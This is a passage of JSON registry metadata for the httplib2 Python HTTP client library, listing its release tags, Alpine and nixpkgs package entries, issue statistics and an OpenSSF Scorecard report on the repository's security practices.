manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T07:23:52.230Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":23.382809038546743,"stargazers_count":4.519273371732388,"forks_count":3.2454585733274257,"average":7.786885245901639},"purl":"pkg:apk/alpine/py2-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.7","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py2-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py2-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py2-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py2-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py2-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py2-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py2-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py2-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py2-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":232,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T09:25:26.668Z","updated_at":"2023-02-01T09:25:26.668Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.7","url":"https://pkgs.alpinelinux.org/packages?branch=v3.7","ecosystem":"alpine","default":false,"packages_count":9028,"maintainers_count":126,"namespaces_count":2,"keywords_count":661,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":310},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.832Z","updated_at":"2026-08-16T05:05:01.411Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/namespaces"}},{"id":13085285,"name":"python312Packages.httplib2","ecosystem":"nixpkgs","description":"Comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T18:00:22.027Z","latest_release_published_at":"2026-02-01T18:00:22.027Z","latest_release_number":"0.22.0","last_synced_at":"2026-03-08T06:18:47.785Z","created_at":"2026-02-01T18:00:21.687Z","updated_at":"2026-08-22T07:23:52.239Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=python312Packages.httplib2","install_command":"nix-env -iA nixpkgs.python312Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/python-modules/httplib2/default.nix#L73","metadata":{"nix_attribute":"python3.12-httplib2-0.22.0","position":"pkgs/development/python-modules/httplib2/default.nix:73","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fht